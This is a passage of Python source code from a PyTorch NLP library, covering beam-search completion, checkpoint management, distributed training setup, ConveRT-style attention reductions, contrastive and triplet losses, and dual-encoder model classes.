probs = probs.masked_fill((lengths != 0), 0)
log_probs = log_probs + probs
end_tokens = torch.full((bsz, self.K, 1), Offsets.EOS, device=device, dtype=paths.dtype)
paths = torch.cat([paths, end_tokens], dim=2)
lengths = update_lengths(lengths, torch.ones_like(lengths) == 1, mxlen)
lengths = update_lengths(lengths, torch.ones_like(lengths) == 1, mxlen)
best_scores = log_probs / self.length_penalty(lengths).squeeze(-1)
# Slice off the Offsets.GO token
paths = paths[:, :, 1:]
return paths, lengths, best_scores
def checkpoint_for(model_base, epoch, tick_type='epoch'):
return '{}-{}-{}'.format(model_base, tick_type, epoch+1)
def rm_old_checkpoints(base_path, current_epoch, last_n=10):
for i in range(0, current_epoch-last_n):
checkpoint_i = checkpoint_for(base_path, i)
for extension in ('.pth', '.npz'):
checkpoint_name = checkpoint_i + extension
if os.path.exists(checkpoint_name):
os.remove(checkpoint_name)
def find_latest_checkpoint(checkpoint_dir: str, wildcard="checkpoint") -> Tuple[str, int]:
step_num = 0
for f in glob.glob(os.path.join(checkpoint_dir, f"{wildcard}*")):
base = os.path.basename(f)
if "-" not in base:
continue
last = base.split("-")[-1]
for x in ('.pth', '.npz'):
last = last.replace(x, '', -1)
this_step_num = int(last)
if this_step_num > step_num:
checkpoint = f
step_num = this_step_num
return checkpoint, step_num
def save_checkpoint(model: torch.nn.Module, model_base: str, count: int, tick_type: str = 'epoch', save_npz: bool = False):
from eight_mile.pytorch.serialize import save_tlm_npz, save_tlm_output_npz, save_transformer_seq2seq_npz, save_transformer_de_npz
checkpoint_name = checkpoint_for(model_base, count, tick_type=tick_type)
# Its possible due to how its called that we might save the same checkpoint twice if we dont check first
if os.path.exists(checkpoint_name):
logger.info("Checkpoint already exists: %s", checkpoint_name)
return
logger.info("Creating checkpoint: %s", checkpoint_name)
model_ = model.module if hasattr(model, 'module') else model
torch.save(model_.state_dict(), checkpoint_name+'.pth')
if save_npz:
if hasattr(model_, 'decoder'):
save_transformer_seq2seq_npz(model_, checkpoint_name+'.npz')
elif hasattr(model_, 'reduction_layer'):
save_transformer_de_npz(model_, checkpoint_name+'.npz')
elif hasattr(model_, 'output_layer'):
save_tlm_output_npz(model_, checkpoint_name+'.npz')
else:
save_tlm_npz(model_, checkpoint_name+'.npz')
if tick_type == 'epoch':
rm_old_checkpoints(model_base, count)
def init_distributed(local_rank):
if local_rank == -1:
# https://github.com/kubeflow/pytorch-operator/issues/128
# https://github.com/pytorch/examples/blob/master/imagenet/main.py
logger.info("Setting local rank to RANK env variable")
local_rank = int(os.environ['RANK'])
logger.warning("Local rank (%d)", local_rank)
# In an env like k8s with kubeflow each worker will only see a single gpu
# with an id of 0. If the gpu count is 1 then we are probably in an env like
# that so we should just use the first (and only) gpu avaiable
if torch.cuda.device_count() == 1:
torch.cuda.set_device(0)
device = torch.device("cuda", 0)
# This program assumes multiprocess/multi-device on a single node. Each
# process gets a rank (via cli or ENV variable) and uses that rank to select
# which gpu to use. This only makes sense on a single node, if you had 4
# processes on 2 nodes where each node has 2 GPUs then the ranks would be
# 0, 1, 2, 3 but the gpus numbers would be node 0: 0, 1 and node 1: 0, 1
# and this assignment to gpu 3 would fail. On a single node with 4 processes
# and 4 gpus the rank and gpu ids will align and this will work
else:
torch.cuda.set_device(local_rank)
device = torch.device("cuda", local_rank)
torch.distributed.init_process_group(backend='nccl', init_method='env://')
return device, local_rank
class AttentionReduction(nn.Module):
"""
This is a reduction that is given Q, K, V and a mask vector. Different from base reductions, which get an embedding stack
"""
def __init__(self):
super().__init__()
def forward(self, qkvm: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""Inputs are the same as for a normal attention function, but the output here is a single tensor, ``[B, H]``
:param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
:param key: a set of keys from encoder or self
:param value: a set of values from encoder or self
:param mask: masking (for destination) to prevent seeing what we shouldnt
:return: sentence-level encoding with dim [B, d_model]
"""
class SingleHeadReduction(AttentionReduction):
"""
Implementation of the "self_attention_head" layer from the conveRT paper (https://arxiv.org/pdf/1911.03688.pdf)
"""
def __init__(
self, d_model: int, dropout: float = 0.0, scale: bool = False, d_k: Optional[int] = None, pooling: str = 'sqrt_length',
):
"""
:param d_model: The model hidden size
:param dropout (``float``): The amount of dropout to use
:param scale: should we scale the dot product attention
:param d_k: The low-order project per head. This is normally `d_model // num_heads` unless set explicitly
"""
super().__init__()
self.output_dim = d_model
if d_k is None:
self.d_k = d_model
else:
self.d_k = d_k
self.w_Q = Dense(d_model, self.d_k)
self.w_K = Dense(d_model, self.d_k)
if scale:
self.attn_fn = SeqScaledDotProductAttention(dropout)
else:
self.attn_fn = SeqDotProductAttention(dropout)
self.attn = None
pooling = pooling.lower()
self.fill = 0
if pooling == 'max':
self.pool = self._max_pool
self.fill = -1e9
elif pooling == 'mean':
self.pool = self._mean_pool
else:
self.pool = self._sqrt_length_pool
def _sqrt_length_pool(self, x, seq_lengths):
x = x.sum(dim=1) # [B, D]
x = x * seq_lengths.float().sqrt().unsqueeze(-1)
return x
def _mean_pool(self, x, seq_lengths):
return torch.sum(x, 1, keepdim=False) / torch.unsqueeze(seq_lengths, -1).to(x.dtype).to(
x.device
)
def _max_pool(self, x, _):
x, _ = torch.max(x, 1, keepdim=False)
return x
def forward(self, qkvm: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""According to conveRT model's graph, they project token encodings to lower-dimensional query and key in single
head, use them to calculate the attention score matrix that has dim [B, T, T], then sum over the query dim to
get a tensor with [B, 1, T] (meaning the amount of attentions each token gets from all other tokens), scale it
by sqrt of sequence lengths, then use it as the weight to weighted sum the token encoding to get the sentence
encoding. we implement it in an equivalent way that can best make use of the eight_mile codes: do the matrix
multiply with value first, then sum over the query dimension.
:param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
:param key: a set of keys from encoder or self
:param value: a set of values from encoder or self
:param mask: masking (for destination) to prevent seeing what we shouldnt
:return: sentence-level encoding with dim [B, d_model]
"""
query, key, value, mask = qkvm
batchsz = query.size(0)
seq_mask = mask.squeeze(1).squeeze(1) # [B, T]
seq_lengths = seq_mask.sum(dim=1)
# (B, H, T, D), still have num_heads = 1 to use the attention function defined in eight_miles
query = self.w_Q(query).view(batchsz, -1, 1, self.d_k).transpose(1, 2)
key = self.w_K(key).view(batchsz, -1, 1, self.d_k).transpose(1, 2)
value = value.view(batchsz, -1, 1, self.output_dim).transpose(1, 2)
x = self.attn_fn((query, key, value, mask)) # [B, 1, T, D]
self.attn = self.attn_fn.attn
x = x.squeeze(1) # [B, T, D]
x = x.masked_fill(seq_mask.unsqueeze(-1) == MASK_FALSE, self.fill)
return self.pool(x, seq_lengths)
class TransformerDiscriminator(nn.Module):
"""A Transformer model that tries to predict if each token is real or fake
This model is based on [ELECTRA: Pre-Training Text Encoders as Discriminators Rather Than Generators,
Clark et al. 2019](https://openreview.net/pdf?id=r1xMH1BtvB).
"""
def __init__(
self,
embeddings,
num_heads: int,
d_model: int,
dropout: bool,
layers: int = 1,
activation: str = "relu",
d_ff: Optional[int] = None,
d_k: Optional[int] = None,
rpr_k: Optional[Union[int, List[int]]] = None,
layer_norms_after: bool = False,
layer_norm_eps: float = 1.0e-6,
embeddings_reduction: str = 'sum',
**kwargs,
):
super().__init__()
self.embeddings = EmbeddingsStack(embeddings, dropout, reduction=embeddings_reduction)
self.weight_std = kwargs.get('weight_std', 0.02)
assert self.embeddings.dsz == d_model
self.transformer = TransformerEncoderStack(
num_heads, d_model=d_model, pdrop=dropout, scale=True,
layers=layers, activation=activation, d_ff=d_ff, rpr_k=rpr_k, d_k=d_k,
layer_norms_after=layer_norms_after, layer_norm_eps=layer_norm_eps
)
self.proj_to_output = pytorch_linear(d_model, 1)
self.apply(self.init_layer_weights)
self.lengths_feature = kwargs.get('lengths_feature', list(self.embeddings.keys())[0])
def init_layer_weights(self, module):
if isinstance(module, (nn.Linear, nn.Embedding, nn.LayerNorm)):
module.weight.data.normal_(mean=0.0, std=self.weight_std)
if isinstance(module, (nn.Linear, nn.LayerNorm)) and module.bias is not None:
module.bias.data.zero_()
def forward(self, features):
embedded = self.embeddings(features)
x = features[self.lengths_feature]
input_mask = torch.zeros(x.shape, device=x.device, dtype=torch.long).masked_fill(x != Offsets.PAD, 1).unsqueeze(1).unsqueeze(1)
transformer_out = self.transformer((embedded, input_mask))
binary = self.proj_to_output(transformer_out)
return torch.sigmoid(binary)
def create_loss(self):
return nn.BCELoss(reduction="none")
class PooledSequenceCriterion(nn.Module):
def __init__(self, LossFn=nn.BCEWithLogitsLoss, avg='token'):
super().__init__()
if avg == 'token':
self.crit = LossFn()
self._norm = self._no_norm
else:
self.crit = LossFn()
self._norm = self._batch_norm
def _batch_norm(self, loss, inputs):
return loss / inputs.size()[0]
def _no_norm(self, loss, inputs):
return loss
def forward(self, inputs, targets):
"""Evaluate some loss over a sequence.
:param inputs: torch.FloatTensor, [B, C] The scores from the model. Batch First
:param targets: torch.LongTensor, The labels.
:returns: torch.FloatTensor, The loss.
"""
#inputs = inputs.transpose(0, 1)
C = inputs.shape[-1]
flat_targets = torch.nn.functional.one_hot(targets, C)
# Get the offsets of the non-zero targets, the values of these are all on
flat_targets = (torch.sum(flat_targets, axis=1) != 0).float()
flat_targets[:, Offsets.PAD] = 0
flat_targets[:, Offsets.EOS] = 0
flat_targets[:, Offsets.GO] = 0
if len(inputs.shape) > 2:
max_per_vocab = inputs.max(0)[0]
loss = self.crit(max_per_vocab, flat_targets)
else:
loss = self.crit(inputs, flat_targets)
return self._norm(loss, inputs)
class SequenceCriterion(nn.Module):
def __init__(self, LossFn=nn.NLLLoss, avg='token'):
super().__init__()
if avg == 'token':
# self.crit = LossFn(ignore_index=Offsets.PAD, reduction='elementwise-mean')
self.crit = LossFn(ignore_index=Offsets.PAD, size_average=True)
self._norm = self._no_norm
else:
self.crit = LossFn(ignore_index=Offsets.PAD, size_average=False)
self._norm = self._batch_norm
def _batch_norm(self, loss, inputs):
return loss / inputs.size()[0]
def _no_norm(self, loss, inputs):
return loss
def forward(self, inputs, targets):
"""Evaluate some loss over a sequence.
:param inputs: torch.FloatTensor, [B, .., C] The scores from the model. Batch First
:param targets: torch.LongTensor, The labels.
:returns: torch.FloatTensor, The loss.
"""
total_sz = targets.nelement()
loss = self.crit(inputs.view(total_sz, -1), targets.view(total_sz))
return self._norm(loss, inputs)
def pytorch_conv1d(in_channels, out_channels, fsz, unif=0, padding=0, initializer=None, stride=1, bias=True, groups=1):
c = nn.Conv1d(in_channels, out_channels, fsz, padding=padding, stride=stride, bias=bias, groups=groups)
if unif > 0:
c.weight.data.uniform_(-unif, unif)
elif initializer == "ortho":
nn.init.orthogonal_(c.weight)
if bias:
nn.init.constant_(c.bias, 0)
elif initializer == "he" or initializer == "kaiming":
nn.init.kaiming_uniform_(c.weight)
if bias:
nn.init.constant_(c.bias, 0)
elif initializer == "normal":
nn.init.normal(mean=0, std=unif)
if bias:
nn.init.constant_(c.bias, 0)
else:
nn.init.xavier_uniform_(c.weight)
if bias:
nn.init.constant_(c.bias, 0)
return c
def tie_weight(to_layer, from_layer):
"""Assigns a weight object to the layer weights.
This method exists to duplicate baseline functionality across packages.
:param to_layer: the pytorch layer to assign weights to
:param from_layer: pytorch layer to retrieve weights from
"""
to_layer.weight = from_layer.weight
class BilinearAttention(nn.Module):
def __init__(self, in_hsz: int, out_hsz: int = 1, bias_x: bool = True, bias_y: bool = True):
super().__init__()
self.in_hsz = in_hsz
self.out_hsz = out_hsz
self.bias_x = bias_x
self.bias_y = bias_y
a1 = in_hsz
a2 = in_hsz
if self.bias_x:
a1 += 1
if self.bias_y:
a2 += 1
self.weight = nn.Parameter(torch.Tensor(out_hsz, in_hsz + bias_x, in_hsz + bias_y))
self.reset_parameters()
def reset_parameters(self):
nn.init.zeros_(self.weight)
#nn.init.orthogonal_(self.weight)
def forward(self, x, y, mask):
r"""
Args:
x: ``[B, T, H]``.
y: ``[B, T, H]``.
Returns:
~torch.Tensor:
A scoring tensor of shape ``[batch_size, n_out, seq_len, seq_len]``.
If ``n_out=1``, the dimension for ``n_out`` will be squeezed automatically.
"""
if self.bias_x is True:
ones = torch.ones(x.shape[:-1] + (1,), device=x.device)
x = torch.cat([x, ones], -1)
if self.bias_y is True:
ones = torch.ones(x.shape[:-1] + (1,), device=y.device)
y = torch.cat([y, ones], -1)
x = x.unsqueeze(1)
y = y.unsqueeze(1)
u = x @ self.weight
s = u @ y.transpose(-2, -1)
if self.out_hsz == 1:
s = s.squeeze(1)
s = s.masked_fill((mask.bool() == MASK_FALSE).unsqueeze(1), -1e9)
return s
class TripletLoss(nn.Module):
"""Provide a Triplet Loss using the reversed batch for negatives"""
def __init__(self, model):
super().__init__()
self.score = nn.CosineSimilarity(dim=1)
self.model = model
def forward(self, inputs, targets):
# reverse the batch and use as a negative example
neg = targets.flip(0)
query = self.model.encode_query(inputs)
response = self.model.encode_response(targets)
neg_response = self.model.encode_response(neg)
pos_score = self.score(query, response)
neg_score = self.score(query, neg_response)
score = neg_score - pos_score
score = score.masked_fill(score < 0.0, 0.0).sum(0)
return score
class ContrastiveLoss(nn.Module):
def __init__(self, model, t=1.0, train_temperature=True):
super().__init__()
self.model = model
if t is None:
t = 1.0
self.t = nn.Parameter(torch.tensor(t).float(), requires_grad=train_temperature)
def forward(self, inputs, targets):
query = self.model.encode_query(inputs) # [B, H]
response = self.model.encode_response(targets) # [B, H]
query = F.normalize(query, p=2, dim=1)
response = F.normalize(response, p=2, dim=1)
labels = torch.arange(query.shape[0], device=query.device)
logits = torch.mm(query, response.T) * self.t.exp()
loss = F.cross_entropy(logits, labels)
return loss
class SymmetricContrastiveLoss(nn.Module):
def __init__(self, model, t=1.0, train_temperature=True):
super().__init__()
self.model = model
if t is None:
t = 1.0
self.t = nn.Parameter(torch.tensor(t).float(), requires_grad=train_temperature)
def forward(self, inputs, targets):
query = self.model.encode_query(inputs) # [B, H]
response = self.model.encode_response(targets) # [B, H]
query = F.normalize(query, p=2, dim=1)
response = F.normalize(response, p=2, dim=1)
labels = torch.arange(query.shape[0], device=query.device)
logits = torch.mm(query, response.T) * self.t.exp()
loss_1 = F.cross_entropy(logits, labels)
loss_2 = F.cross_entropy(logits.T, labels)
loss = (loss_1 + loss_2) * 0.5
return loss
class AllLoss(nn.Module):
def __init__(self, model, warmup_steps=10000, reduction_type='sum'):
r"""Loss from here https://arxiv.org/pdf/1705.00652.pdf see section 4
We want to minimize the negative log prob of y given x
-log P(y|x)
P(y|x) P(x) = P(x, y) Chain Rule of Probability
P(y|x) = P(x, y) / P(x) Algebra
P(y|x) = P(x, y) / \sum_\hat(y) P(x, y = \hat(y)) Marginalize over all possible ys to get the probability of x
P_approx(y|x) = P(x, y) / \sum_i^k P(x, y_k) Approximate the Marginalization by just using the ys in the batch
S(x, y) is the score (cosine similarity between x and y in this case) from our neural network
P(x, y) = e^S(x, y)
P(y|x) = e^S(x, y) / \sum_i^k e^S(x, y_k)
log P(y|x) = log( e^S(x, y) / \sum_i^k e^S(x, y_k))
log P(y|x) = S(x, y) - log \sum_i^k e^S(x, y_k)
-log P(y|x) = -(S(x, y) - log \sum_i^k e^S(x, y_k))
"""
super().__init__()
self.score = nn.CosineSimilarity(dim=-1)
self.model = model
self.max_scale = math.sqrt(self.model.embeddings.output_dim)
self.steps = 0
self.warmup_steps = warmup_steps
self.reduction = torch.mean if reduction_type == 'mean' else torch.sum
def forward(self, inputs, targets):
# This is the cosine distance annealing referred to in https://arxiv.org/pdf/1911.03688.pdf
fract = min(self.steps / self.warmup_steps, 1)
c = (self.max_scale-1) * fract + 1
self.steps += 1
# These will get broadcast to [B, B, H]
query = self.model.encode_query(inputs).unsqueeze(1) # [B, 1, H]
response = self.model.encode_response(targets).unsqueeze(0) # [1, B, H]
# all_scores is now a batch x batch matrix where index (i, j) is the score between
# the i^th x vector and the j^th y vector
all_score = c * self.score(query, response) # [B, B]
# The diagonal has the scores of correct pair, (i, i)
pos_score = torch.diag(all_score)
# vec_log_sum_exp will calculate the batched log_sum_exp in a numerically stable way
# the result is a [B, 1] vector which we squeeze to make it [B] to match the diag
# Because we are minimizing the negative log we turned the division into a subtraction here
loss = pos_score - vec_log_sum_exp(all_score, -1).squeeze()
# Batch loss
loss = self.reduction(loss)
# minimize the negative loss
return -loss
class CosineSimilarityLoss(nn.Module):
def __init__(self, neg_value=0.3, pos_value=0.8):
super().__init__()
self.pos_value = pos_value
self.neg_value = neg_value
def forward(self, embeddings_reduction, labels):
hsz = int(embeddings_reduction.shape[-1]//2)
label_values = torch.zeros_like(labels, dtype=torch.float)
label_values[labels == 0] = self.neg_value
label_values[labels == 1] = self.pos_value
output = torch.cosine_similarity(embeddings_reduction[:,:hsz], embeddings_reduction[:,hsz:])
loss = F.mse_loss(output, label_values.view(-1), reduction='mean')
return loss
class OnlineContrastiveLoss(nn.Module):
def __init__(self):
super().__init__()
def forward(self, embeddings_reduction, labels):
hsz = int(embeddings_reduction.shape[-1]//2)
x = embeddings_reduction[:,:hsz]
y = embeddings_reduction[:,hsz:]
distance_matrix = 1-F.cosine_similarity(x, y)
negs = distance_matrix[labels == 0]
poss = distance_matrix[labels == 1]
# select hard positive and hard negative pairs
negative_pairs = negs[negs < (poss.max() if len(poss) > 1 else negs.mean())]
positive_pairs = poss[poss > (negs.min() if len(negs) > 1 else poss.mean())]
positive_loss = positive_pairs.pow(2).sum()
negative_loss = F.relu(0.5 - negative_pairs).pow(2).sum()
loss = positive_loss + negative_loss
return loss
class TwoHeadConcat(AttentionReduction):
"""Use two parallel SingleHeadReduction, and concatenate the outputs. It is used in the conveRT
paper (https://arxiv.org/pdf/1911.03688.pdf)"""
def __init__(self, d_model, dropout, scale=False, d_k=None, pooling='sqrt_length'):
"""Two parallel 1-head self-attention, then concatenate the output
:param d_model: dim of the self-attention
:param dropout: dropout of the self-attention
:param scale: scale fo the self-attention
:param d_k: d_k of the self-attention
:return: concatenation of the two 1-head attention
"""
super().__init__()
self.output_dim = 2*d_model
self.reduction1 = SingleHeadReduction(d_model, dropout, scale=scale, d_k=d_k, pooling=pooling)
self.reduction2 = SingleHeadReduction(d_model, dropout, scale=scale, d_k=d_k, pooling=pooling)
def forward(self, inputs: torch.Tensor):
x = inputs
encoding1 = self.reduction1(x)
encoding2 = self.reduction2(x)
x = torch.cat([encoding1, encoding2], dim=-1)
return x
class ConveRTFFN(nn.Module):
"""Implementation of the FFN layer from the convert paper (https://arxiv.org/pdf/1911.03688.pdf)"""
def __init__(self, insz, hszs, outsz, pdrop):
"""
:param insz: input dim
:param hszs: list of hidden sizes
:param outsz: output dim
:param pdrop: dropout of each hidden layer
"""
super().__init__()
self.dense_stack = DenseStack(insz,
hszs,
activation='gelu',
pdrop_value=pdrop,
skip_connect=True,
layer_norm=True)
self.final = Dense(hszs[-1], outsz)
self.proj = Dense(insz, outsz) if insz != outsz else nn.Identity()
self.ln1 = nn.LayerNorm(insz, eps=1e-6)
self.ln2 = nn.LayerNorm(outsz, eps=1e-6)
def forward(self, inputs):
x = self.ln1(inputs)
x = self.dense_stack(x)
x = self.final(x)
x = x + self.proj(inputs)
return self.ln2(x)
class DualEncoderModel(nn.Module):
"""Abstract base for dual encoders
We can assume that our dual encoder needs to end up in the same output plane between the encoders, and we can define
the set of losses here that we are likely to need for most.
"""
def __init__(self, in_sz: int, stacking_layers: Union[int, List[int]] = None, d_out: int = 512,
ffn_pdrop=0.1, in_sz_2=None, output_layer=False, output_activation='tanh', output_shared=False):
super().__init__()
if not in_sz_2:
in_sz_2 = in_sz
if stacking_layers:
stacking_layers = listify(stacking_layers)
if stacking_layers:
self.ff1 = ConveRTFFN(in_sz, stacking_layers, d_out, ffn_pdrop)
self.ff2 = ConveRTFFN(in_sz_2, stacking_layers, d_out, ffn_pdrop)
elif output_layer or in_sz != d_out or in_sz != in_sz_2:
activation = output_activation if output_layer else None
self.ff1 = Dense(in_sz, d_out, activation=activation)
if in_sz == in_sz_2 and output_shared:
self.ff2 = self.ff1
else:
self.ff2 = Dense(in_sz_2, d_out, activation=activation)
else:
self.ff1 = nn.Identity()
self.ff2 = nn.Identity()
self.output_dim = d_out
def encode_query_base(self, query: torch.Tensor) -> torch.Tensor:
pass
def encode_response_base(self, response: torch.Tensor) -> torch.Tensor:
pass
def encode_query(self, query: torch.Tensor) -> torch.Tensor:
tensor = self.encode_query_base(query)
return self.ff1(tensor)
def encode_response(self, response: torch.Tensor) -> torch.Tensor:
tensor = self.encode_response_base(response)
return self.ff2(tensor)
def forward(self, query, response):
encoded_query = self.encode_query(query)
encoded_response = self.encode_response(response)
return encoded_query, encoded_response
def create_loss(self, loss_type='symmetric', init_temp=None, learn_temp=False):
if loss_type == 'all':
return AllLoss(self)
elif loss_type == 'all_mean':
return AllLoss(self, reduction_type='mean')
elif loss_type == 'contrastive':
return ContrastiveLoss(self, init_temp, learn_temp)
elif loss_type == 'symmetric':
return SymmetricContrastiveLoss(self, init_temp, learn_temp)
return TripletLoss(self)
class BasicDualEncoderModel(DualEncoderModel):
"""A simple encoder where the encoders are injected and supply the `encode_query_base` and `encode_response_base`
"""
def __init__(self, encoder_1: nn.Module, encoder_2: nn.Module, stacking_layers: Union[int, List[int]] = None, d_out: int = 512, ffn_pdrop=0.1):
super().__init__(encoder_1.output_dim, stacking_layers, d_out, ffn_pdrop, in_sz_2=encoder_2.output_dim)
self.encoder_1 = encoder_1
self.encoder_2 = encoder_2
def encode_query_base(self, query: torch.Tensor) -> torch.Tensor:
return self.encoder_1(query)
def encode_response_base(self, response: torch.Tensor) -> torch.Tensor:
return self.encoder_2(response)
class PairedModel(DualEncoderModel):
"""Legacy model for transformer-based dual encoder
This is a dual-encoder transformer model which shares the lower layer encoder transformer sub-graph
The reduction layer is attention based and takes the same input as the transformer layers. It pools the reprs
Finally, the feed-forward stacks are applied via subclassing.
Note that this model predates the more abstract `AbstractDualEncoder` which could accomplish the same thing
by injecting the same `nn.Module` for encoder_1 and encoder_2 consisting of the transformer and reduction
"""
def __init__(self, embeddings,
d_model: int,
d_ff: int,
dropout: float,
num_heads: int,
num_layers: int,
stacking_layers: Optional[nn.Module] = None,
d_out: Optional[int] = None,
d_k: Optional[int] = None,
weight_std: float = 0.02,
rpr_k: Optional[int] = None,
reduction_d_k: int = 64,
ffn_pdrop: float = 0.1,
windowed_ra: bool = False,
rpr_value_on: bool = False,
reduction_type: str = "2ha",
freeze_encoders: bool = False,
layer_norms_after: bool = False,
embeddings_reduction: str = 'sum',
layer_norm_eps: float=1e-6,
output_layer: bool = False,
output_activation: str = 'tanh',
output_shared: bool = False,
transformer_type: Optional[str]=None,
**kwargs):
super().__init__(2*d_model if reduction_type.startswith("2") else d_model, stacking_layers,
d_out if d_out is not None else d_model, ffn_pdrop, None, output_layer,
output_activation, output_shared)
reduction_type = reduction_type.lower()
self.reduce_fn = self._reduce_3
if reduction_type == "2ha":
self.reduction_layer = TwoHeadConcat(d_model, dropout, scale=False, d_k=reduction_d_k)
elif reduction_type == "2ha_mean":
self.reduction_layer = TwoHeadConcat(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="mean")
elif reduction_type == "2ha_max":
self.reduction_layer = TwoHeadConcat(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="max")
elif reduction_type == "sha":
self.reduction_layer = SingleHeadReduction(d_model, dropout, scale=False, d_k=reduction_d_k)
elif reduction_type == "sha_mean":
self.reduction_layer = SingleHeadReduction(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="mean")
elif reduction_type == "sha_max":
self.reduction_layer = SingleHeadReduction(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="max")
elif reduction_type == 'max':
self.reduce_fn = self._reduce_1
self.reduction_layer = MaxPool1D(self.output_dim)
elif reduction_type == 'mean':
self.reduce_fn = self._reduce_1
self.reduction_layer = MeanPool1D(self.output_dim)
elif reduction_type == 'cls' or reduction_type == 'zero':
self.reduce_fn = self._reduce_0
else:
raise Exception("Unknown exception type")
self.weight_std = weight_std
ra_type = kwargs.get('ra_type')
self.transformer = TransformerEncoderStack(num_heads=num_heads, d_model=d_model,
pdrop=dropout, layers=num_layers, activation='gelu', d_ff=d_ff,
ffn_pdrop=ffn_pdrop,
d_k=d_k, rpr_k=rpr_k, windowed_ra=windowed_ra, rpr_value_on=rpr_value_on,
layer_norms_after=layer_norms_after, layer_norm_eps=layer_norm_eps,
ra_type=ra_type, transformer_type=transformer_type)
self.embeddings = EmbeddingsStack({'x': embeddings}, 0.0, False, embeddings_reduction)
self.freeze = freeze_encoders
self.apply(self.init_layer_weights)
def init_layer_weights(self, module):
if isinstance(module, (nn.Linear, nn.Embedding, nn.LayerNorm)):
module.weight.data.normal_(mean=0.0, std=self.weight_std)
if isinstance(module, (nn.Linear, nn.LayerNorm)) and module.bias is not None:
module.bias.data.zero_()
def _reduce_3(self, encoded, att_mask):
"""The attention modules originally created for DE have 3 (redundant) inputs, so use all 3 here
"""
return self.reduction_layer((encoded, encoded, encoded, att_mask))
def _reduce_1(self, encoded, att_mask):
"""The standard reduction modules use an input and a length
"""
lengths = att_mask.squeeze(1).squeeze(1).sum(-1)
return self.reduction_layer((encoded, lengths))
def _reduce_0(self, encoded, _):
"""The [CLS] or <s> reduction on the first token just needs the first timestep
"""
return encoded[:, 0]
def encode_query_base(self, query):
query_mask = (query != Offsets.PAD)
att_mask = query_mask.unsqueeze(1).unsqueeze(1)
with torch.no_grad() if self.freeze else contextlib.ExitStack():
embedded = self.embeddings({'x': query})
encoded_query = self.transformer((embedded, att_mask))
encoded_query = self.reduce_fn(encoded_query, att_mask)
return encoded_query
def encode_response_base(self, response):
response_mask = (response != Offsets.PAD)
att_mask = response_mask.unsqueeze(1).unsqueeze(1)
with torch.no_grad() if self.freeze else contextlib.ExitStack():
embedded = self.embeddings({'x': response})
encoded_response = self.transformer((embedded, att_mask))
encoded_response = self.reduce_fn(encoded_response, att_mask)
return encoded_response
class TransformerBoWPairedModel(DualEncoderModel):
"""2 Encoders (E1, E2). E1 is a Transformer followed by attention reduction. E2 is just a pooling of embeddings
"""
def __init__(self, embeddings,
d_model,
d_ff,
dropout,
num_heads,
num_layers,
stacking_layers=None,
d_out=512,
d_k=None,
weight_std=0.02,
rpr_k=None,
reduction_d_k=64,
ffn_pdrop=0.1,
windowed_ra=False,
rpr_value_on=False,
reduction_type_1="2ha",
freeze_encoders=False,
layer_norms_after=False,
transformer_type: Optional[str]=None,
**kwargs):
super().__init__(d_model, stacking_layers, d_out, ffn_pdrop)
reduction_type_1 = reduction_type_1.lower()
if reduction_type_1 == "2ha":
self.reduction_layer_1 = nn.Sequential(TwoHeadConcat(d_model, dropout, scale=False, d_k=reduction_d_k),
nn.Linear(2*d_model, d_model))
elif reduction_type_1 == "2ha_mean":
self.reduction_layer_1 = nn.Sequential(TwoHeadConcat(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="mean"),
nn.Linear(2 * d_model, d_model))
elif reduction_type_1 == "2ha_max":
self.reduction_layer_1 = nn.Sequential(TwoHeadConcat(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="max"),
nn.Linear(2 * d_model, d_model))
elif reduction_type_1 == "sha":
self.reduction_layer_1 = SingleHeadReduction(d_model, dropout, scale=False, d_k=reduction_d_k)
elif reduction_type_1 == "sha_mean":
self.reduction_layer_1 = SingleHeadReduction(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="mean")
elif reduction_type_1 == "sha_max":
self.reduction_layer_1 = SingleHeadReduction(d_model, dropout, scale=False, d_k=reduction_d_k, pooling="max")
else:
raise Exception("Unknown exception type")
self.weight_std = weight_std
ra_type = kwargs.get('ra_type')
self.transformer = TransformerEncoderStack(num_heads=num_heads, d_model=d_model,
pdrop=dropout, layers=num_layers, activation='gelu', d_ff=d_ff,
ffn_pdrop=ffn_pdrop,
d_k=d_k, rpr_k=rpr_k, windowed_ra=windowed_ra, rpr_value_on=rpr_value_on,
layer_norms_after=layer_norms_after, ra_type=ra_type, transformer_type=transformer_type)
self.embeddings = EmbeddingsStack({'x': embeddings})
self.freeze = freeze_encoders
self.reduction_layer_2 = MaxPool1D(d_out) if reduction_type_1.endswith('max') else MeanPool1D(d_out)
self.apply(self.init_layer_weights)
def init_layer_weights(self, module):
if isinstance(module, (nn.Linear, nn.Embedding, nn.LayerNorm)):
module.weight.data.normal_(mean=0.0, std=self.weight_std)
if isinstance(module, (nn.Linear, nn.LayerNorm)) and module.bias is not None:
module.bias.data.zero_()
def encode_query_base(self, query):
query_mask = (query != Offsets.PAD)
att_mask = query_mask.unsqueeze(1).unsqueeze(1)
with torch.no_grad() if self.freeze else contextlib.ExitStack():
embedded = self.embeddings({'x': query})
encoded_query = self.transformer((embedded, att_mask))
encoded_query = self.reduction_layer_1((encoded_query, encoded_query, encoded_query, att_mask))
return encoded_query
def encode_response_base(self, response):
response_lengths = torch.sum(response != Offsets.PAD, dim=1)
with torch.no_grad() if self.freeze else contextlib.ExitStack():
embedded = self.embeddings({'x': response})
encoded_response = self.reduction_layer_2((embedded, response_lengths))
return encoded_response
class CudaTimer:
"""A CUDA timer context manager that can be used to track and record events
The timer is only enabled if `MEAD_PYTORCH_TIMER` is true. If its enabled, it
will cause a large slowdown (similar to `CUDA_LAUNCH_BLOCKING`).
"""
def __init__(self, name, sync_before=True):
"""
:param name:
:param sync_before:
"""
self.enabled = str2bool(os.getenv('MEAD_PYTORCH_TIMER', False))
if self.enabled:
self._name = name
self._start = torch.cuda.Event(enable_timing=True)
self._end = torch.cuda.Event(enable_timing=True)
if sync_before:
torch.cuda.synchronize()
def __enter__(self):
if self.enabled:
self._start.record()
